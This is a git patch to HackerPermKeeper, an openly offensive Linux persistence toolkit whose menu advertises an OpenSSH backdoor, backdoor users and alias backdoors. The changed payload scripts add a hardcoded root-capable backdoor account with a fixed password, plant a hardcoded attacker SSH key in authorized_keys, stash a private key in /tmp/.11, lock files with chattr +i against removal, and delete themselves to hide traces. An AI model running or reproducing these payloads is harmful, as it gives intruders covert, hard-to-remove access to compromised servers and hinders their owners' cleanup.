From c5bbb2a2338e517eee1c1c22443d0a37d3d75f7c Mon Sep 17 00:00:00 2001
From: RuoJi6 <79234113+RuoJi6@users.noreply.github.com>
Date: Mon, 25 Sep 2023 13:23:56 +0800
Subject: [PATCH] Add files via upload

---
 config.py | 4 +--
 main.py | 2 +-
 payload/2adduser/adduser.py | 17 +++++++---
 payload/2adduser/adduser_new_user.py | 21 +++++++-----
 payload/6sshkey/sshkey_local.py | 16 ++++++++-
 payload/6sshkey/sshkey_target.py | 50 ++++++++++++++++++----------
 6 files changed, 76 insertions(+), 34 deletions(-)

diff --git a/config.py b/config.py
index 1f910f1..a1aba53 100644
--- a/config.py
+++ b/config.py
@@ -10,7 +10,7 @@ def configs():
- print(colored('HackerPermKeeper v3.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
+ print(colored('HackerPermKeeper v4.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
 print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red'))
 print('OpenSSH后门 优点:直接重置目标服务器的OpenSSH,在里面写入万能密码以及记录ssh明文账户代码 '' 缺点:需要依大量的依赖环境,而且只能使用低版本系统,目前经过测试的有乌班图14',colored('[建议指数:*]\n', 'red'))
@@ -52,7 +52,7 @@ def configs():
 print('检测对方服务器适合什么类型的权限维持模块', colored('[*****]', 'red'))
 def configss():
- print(colored('HackerPermKeeper v3.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
+ print(colored('HackerPermKeeper v4.0 by 弱鸡 支持以下漏洞检测 https://github.com/RuoJi6/HackerPermKeeper', 'green'))
 print(colored('1--------------OpenSSH后门', 'yellow'),colored('[利用]', 'red'))
 print(colored('2--------------后门用户', 'yellow'),colored('[利用]', 'red'))
 print(colored('3--------------Alias后门', 'yellow'),colored('[利用]', 'red'))
diff --git a/main.py b/main.py
index 6ef03e9..0e1051e 100644
--- a/main.py
+++ b/main.py
@@ -44,7 +44,7 @@ def ml(command):
 # print('No')
 try:
- name = colored('HackerPermKeeper v2.0 by 弱鸡 https://github.com/RuoJi6/HackerPermKeeper', 'green')
+ name = colored('HackerPermKeeper v4.0 by 弱鸡 https://github.com/RuoJi6/HackerPermKeeper', 'green')
 arg = ArgumentParser(description=name) # 创建解析器, description内容就是
 arg.add_argument("-m", "--multiple", help="选择权限维持模块 -m 1")
 arg.add_argument("-c", "--config", help="查看支持的权限维持模块 -c 1,查看详细使用说明 -c 2 ")
diff --git a/payload/2adduser/adduser.py b/payload/2adduser/adduser.py
index c1d68d7..c317f4a 100644
--- a/payload/2adduser/adduser.py
+++ b/payload/2adduser/adduser.py
@@ -37,10 +37,17 @@ def adduser(user, password):
 def deluser(user):
- command = "sed -i '/^" + user + ":/d' /etc/shadow"
- ml(command)
- command = "sed -i '/^" + user + ":/d' /etc/passwd"
- ml(command)
+ try:
+ ml('chattr -i /etc/passwd')
+ ml('chattr -i /etc/shadow')
+ command = "sed -i '/^" + user + ":/d' /etc/shadow"
+ # "sed -i '/^passw123:/d' /etc/shadow"
+ ml(command)
+ command = "sed -i '/^" + user + ":/d' /etc/passwd"
+ ml(command)
+ except Exception as e:
+ pass
+
 def delete_current_script():
 try:
@@ -53,6 +60,6 @@ def delete_current_script():
 if __name__ == '__main__':
 user = 'passw123'
 password = 'admin@#45123'
+ deluser(user) # 删除用户
 adduser(user, password)
- # deluser(user) #删除用户
 delete_current_script() # 删除当前执行脚本文件
diff --git a/payload/2adduser/adduser_new_user.py b/payload/2adduser/adduser_new_user.py
index 560296e..bd2004e 100644
--- a/payload/2adduser/adduser_new_user.py
+++ b/payload/2adduser/adduser_new_user.py
@@ -2,6 +2,7 @@ from __future__ import print_function
 import subprocess
 import sys,os
+import requests
 def ml(command):
 process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -33,6 +34,17 @@ def adduser(user, password):
 else:
 print("----------------------->失败<-----------------------")
+def deluser(user):
+ try:
+ ml('chattr -i /etc/passwd')
+ ml('chattr -i /etc/shadow')
+ command = "sed -i '/^" + user + ":/d' /etc/shadow"
+ ml(command)
+ command = "sed -i '/^" + user + ":/d' /etc/passwd"
+ ml(command)
+ except Exception as e:
+ pass
+
 def delete_current_script():
 try:
 script_path = os.path.abspath(sys.argv[0])
@@ -41,16 +53,9 @@ def delete_current_script():
 except Exception as e:
 print("无法删除当前脚本文件:", e)
-def deluser(user):
- command = "sed -i '/^" + user + ":/d' /etc/shadow"
- ml(command)
- command = "sed -i '/^" + user + ":/d' /etc/passwd"
- ml(command)
-
-
 if __name__ == '__main__':
 user = 'passw123'
 password = 'admin@#45123'
+ deluser(user) # 删除用户
 adduser(user, password)
- # deluser(user) #删除用户
 delete_current_script() # 删除当前执行脚本文件
diff --git a/payload/6sshkey/sshkey_local.py b/payload/6sshkey/sshkey_local.py
index 7926d86..8756492 100644
--- a/payload/6sshkey/sshkey_local.py
+++ b/payload/6sshkey/sshkey_local.py
@@ -75,17 +75,31 @@ def delete_current_script():
 except Exception as e:
 print("无法删除当前脚本文件:", e)
+def delsshKey(user):
+ try:
+ if 'root' in user:
+ ml('chattr -i /root/.ssh')
+ ml('chattr -i /root/.ssh/authorized_keys')
+ ml('rm -rf /root/.ssh/authorized_keys')
+ else:
+ ml('chattr -i /home/'+user+'/.ssh')
+ ml('chattr -i /home/'+user+'/.ssh/authorized_keys')
+ ml('rm -rf /home/' + user + '/.ssh/authorized_keys')
+ except Exception as e:
+ pass
+
 if __name__ == '__main__':
 id_ed25519_pub = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF9OQyvU7TkC4Julezg31Lbj2YB3RSwhmM0yJwwtO4iK kali@kali"
 # 调用 miyue 函数来在文件末尾写入新内容
 # ssh-keygen -t ed25519 -N "admin!@#45123"
+ user = ml('whoami').strip()
+ delsshKey(user)
 try:
 miyue("HostKey /etc/ssh/ssh_host_ed25519_key")
 miyue("PubkeyAuthentication yes")
 miyue("AuthorizedKeysFile .ssh/authorized_keys")
 except Exception as e:
 print('低权限用户配置文件写入失败,有的低权限用户不影响使用')
- user = ml('whoami').strip()
 if 'root' in user:
 root_authorized_keys(id_ed25519_pub)
 ml('chattr +i /root/.ssh && chattr +i /root/.ssh/authorized_keys')
diff --git a/payload/6sshkey/sshkey_target.py b/payload/6sshkey/sshkey_target.py
index ed40465..17e5aba 100644
--- a/payload/6sshkey/sshkey_target.py
+++ b/payload/6sshkey/sshkey_target.py
@@ -2,7 +2,8 @@
 # !/usr/bin/env python
 from __future__ import print_function
 import subprocess
-import os,sys
+import os, sys
+
 def ml(command):
 process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@@ -26,7 +27,7 @@ def miyue(new_content):
 file.write(new_content + '\n')
-def generate_ssh_key(password,user):
+def generate_ssh_key(password, user):
 if 'root' in user:
 command = 'ssh-keygen -t ed25519 -N "' + password + '" -q -f /' + user + '/.ssh/id_ed25519'
 else:
@@ -40,18 +41,20 @@ def generate_ssh_key(password,user):
 print("SSH密钥生成失败。错误信息:")
 print(error.decode())
-def file_key(user,keyt):
+
+def file_key(user, keyt):
 if 'root' in user:
 file_path = "/" + user + "/.ssh/authorized_keys"
 else:
 file_path = "/home/" + user + "/.ssh/authorized_keys"
 if os.path.exists(file_path):
 print("文件写入成功")
- id_ed25519(user,keyt)
+ id_ed25519(user, keyt)
 else:
 print("文件写入失败")
-def id_ed25519(user,keyt):
+
+def id_ed25519(user, keyt):
 if 'root' in user:
 file_path = "/" + user + "/.ssh/id_ed25519.pub"
 file_path2 = "/" + user + "/.ssh/id_ed25519"
@@ -62,42 +65,55 @@ def id_ed25519(user,keyt):
 print("id_ed25519.pub&id_ed25519删除失败")
 else:
 print("id_ed25519.pub&id_ed25519删除成功")
- print('----->利用成功,生成的用户为:',ml('whoami').strip(),'<-----')
- print('----->连接命令: ssh -i 密钥文件 '+ str(ml('whoami').strip())+'@ip <-----')
- print('请下载{'+keyt+'}密钥文件连接')
-
+ print('----->利用成功,生成的用户为:', ml('whoami').strip(), '<-----')
+ print('----->连接命令: ssh -i 密钥文件 ' + str(ml('whoami').strip()) + '@ip <-----')
+ print('请下载{' + keyt + '}密钥文件连接')
 def delete_current_script():
 try:
 script_path = os.path.abspath(sys.argv[0])
 os.remove(script_path)
- print("当前脚本文件已成功删除"+script_path)
+ print("当前脚本文件已成功删除" + script_path)
 except Exception as e:
 print("无法删除当前脚本文件:", e)
+
+def delsshKey(user):
+ try:
+ if 'root' in user:
+ ml('chattr -i /root/.ssh')
+ ml('chattr -i /root/.ssh/authorized_keys')
+ else:
+ ml('chattr -i /home/' + user + '/.ssh')
+ ml('chattr -i /home/' + user + '/.ssh/authorized_keys')
+ except Exception as e:
+ pass
+
+
 if __name__ == '__main__':
 # 调用 miyue 函数来在文件末尾写入新内容
 # 调用 generate_ssh_key 函数生成SSH密钥对
+ user = ml('whoami').strip()
+ delsshKey(user)
 try:
 miyue("HostKey /etc/ssh/ssh_host_ed25519_key")
 miyue("PubkeyAuthentication yes")
 miyue("AuthorizedKeysFile .ssh/authorized_keys")
 except Exception as e:
 print('低权限用户配置文件写入失败,有的低权限用户不影响使用')
- user = ml('whoami').strip()
 password = "admin!@#45123"
 keyt = '/tmp/.11'
- generate_ssh_key(password,user)
+ generate_ssh_key(password, user)
 if 'root' in user:
 ml('cat /' + user + '/.ssh/id_ed25519.pub >> /' + user + '/.ssh/authorized_keys && chmod 600 /' + user + '/.ssh/authorized_keys && chmod 700 /' + user + '/.ssh/')
- ml('cp /' + user + '/.ssh/id_ed25519 '+keyt)
- ml('rm -rf /' + user + '/.ssh/id_ed25519 && rm -rf /'+ user + '/.ssh/id_ed25519.pub')
+ ml('cp /' + user + '/.ssh/id_ed25519 ' + keyt)
+ ml('rm -rf /' + user + '/.ssh/id_ed25519 && rm -rf /' + user + '/.ssh/id_ed25519.pub')
 ml('chattr +i /' + user + '/.ssh && chattr +i /' + user + '/.ssh/authorized_keys')
 else:
 ml('cat /home/' + user + '/.ssh/id_ed25519.pub >> /home/' + user + '/.ssh/authorized_keys && chmod 600 /home/' + user + '/.ssh/authorized_keys && chmod 700 /home/' + user + '/.ssh/')
- ml('cp /home/' + user + '/.ssh/id_ed25519 '+keyt)
- ml('rm -rf /home/' + user + '/.ssh/id_ed25519 && rm -rf /home/'+ user + '/.ssh/id_ed25519.pub')
+ ml('cp /home/' + user + '/.ssh/id_ed25519 ' + keyt)
+ ml('rm -rf /home/' + user + '/.ssh/id_ed25519 && rm -rf /home/' + user + '/.ssh/id_ed25519.pub')
 ml('chattr +i /home/' + user + '/.ssh && chattr +i /' + user + ' /home/.ssh/authorized_keys')
- file_key(user,keyt)
+ file_key(user, keyt)
 delete_current_script() # 删除当前执行脚本文件